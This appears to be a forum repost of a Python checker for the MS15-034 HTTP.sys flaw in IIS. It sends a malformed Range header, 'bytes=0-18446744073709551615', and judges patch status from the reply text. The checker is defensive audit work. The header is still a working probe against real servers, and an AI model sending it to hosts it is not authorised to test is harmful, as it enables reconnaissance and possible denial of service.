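# Forum post by Nytro, April 16, 2015.
'''
MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in terrible ways.

It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
an HTTP range request.

-BF

8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

(The ASCII-art banner that opened the original docstring is left out: its
layout did not survive extraction.)

How the verdict is reached
--------------------------
1. A plain HTTP/1.0 request is sent; if the reply does not contain the text
   "Microsoft" the host is reported as "Not IIS" and nothing else is sent.
2. One HTTP/1.1 request with "Range: bytes=0-18446744073709551615" is sent.
   A reply containing "Requested Range Not Satisfiable" is reported as
   vulnerable; a reply containing " The request has an invalid header name"
   is reported as patched; anything else is reported as inconclusive.

Limits of the result
--------------------
* Both steps match on response text only. A host whose "Microsoft" banner has
  been removed is reported as "Not IIS" without being tested, and a proxy,
  load balancer or filter in front of the server may be what actually
  answers, so the verdict can describe the front end rather than the host.
* "Unexpected response" and "Not IIS" do not show that a host is patched;
  confirm from the host's installed updates that the MS15-034 update is
  present.
* The Range value used here is distinctive, so the same string is a practical
  thing to search for in web-server logs and network monitoring.

Usage: set ipAddr below, or pass the host as the first command-line argument.
'''
import socket
import random
import sys

ipAddr = ""
port = 80
# Seconds to wait on connect and on each read, so an unresponsive host cannot
# hang the audit forever.
timeoutSeconds = 10
# Upper bound on how much of a reply is buffered.
maxResponseBytes = 8192

# Despite the name this is the *decimal* form of 0xFFFFFFFFFFFFFFFF (2**64 - 1).
hexAllFfff = "18446744073709551615"
# Requests are bytes so the script runs unchanged on Python 2 and Python 3.
req1 = b"GET / HTTP/1.0\r\n\r\n"
req = (b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-"
       + hexAllFfff.encode("ascii") + b"\r\n\r\n")

VULN_MARKER = b"Requested Range Not Satisfiable"
# The leading space is part of the marker, exactly as in the original check.
PATCHED_MARKER = b" The request has an invalid header name"


def looks_like_iis(resp):
    """Return True when the banner reply contains the text "Microsoft"."""
    return b"Microsoft" in resp


def classify_range_response(resp):
    """Map the reply to the Range probe onto the message the script prints.

    The vulnerable marker is tested first, then the patched marker; a reply
    with neither is reported as inconclusive.
    """
    if VULN_MARKER in resp:
        return "[!!] Looks VULN"
    if PATCHED_MARKER in resp:
        return "[*] Looks Patched"
    return "[*] Unexpected response, cannot discern patch status"


def exchange(host, request, stop_markers):
    """Send one request on a fresh connection and return the reply bytes.

    Reading continues until one of *stop_markers* has been seen, the peer
    closes, a read times out, or maxResponseBytes have been buffered. A single
    recv() may return only part of a reply (for example headers without the
    body that carries the patched marker), which would turn a clear answer
    into an "Unexpected response". The socket is always closed.
    """
    sock = socket.create_connection((host, port), timeoutSeconds)
    try:
        sock.sendall(request)
        data = b""
        while len(data) < maxResponseBytes:
            try:
                chunk = sock.recv(1024)
            except socket.timeout:
                break  # keep-alive connection with nothing more to say
            if not chunk:
                break  # peer closed the connection
            data += chunk
            if any(marker in data for marker in stop_markers):
                break
        return data
    finally:
        sock.close()


def main(argv=None):
    """Run the two-step check and return the process exit status.

    *argv* is the argument list without the program name; when omitted,
    sys.argv[1:] is used. Returns 0 after a completed check (including
    "Not IIS"), 1 when the host could not be reached, and 2 when no target
    was given.
    """
    args = sys.argv[1:] if argv is None else argv
    target = args[0] if args else ipAddr
    if not target:
        print("[*] No target set: pass a host as the first argument or fill in ipAddr")
        return 2

    print("[*] Audit Started")
    try:
        # Step 1: banner check, read up to the end of the response headers.
        boringResp = exchange(target, req1, (b"\r\n\r\n",))
        if not looks_like_iis(boringResp):
            print("[*] Not IIS")
            return 0
        # Step 2: the Range probe, read until a verdict marker shows up.
        goodResp = exchange(target, req, (VULN_MARKER, PATCHED_MARKER))
    except socket.error as err:
        print("[*] Connection failed: %s" % err)
        return 1

    print(classify_range_response(goodResp))
    return 0


if __name__ == "__main__":
    sys.exit(main())

# Source: http://pastebin.com/raw.php?i=ypURDPc4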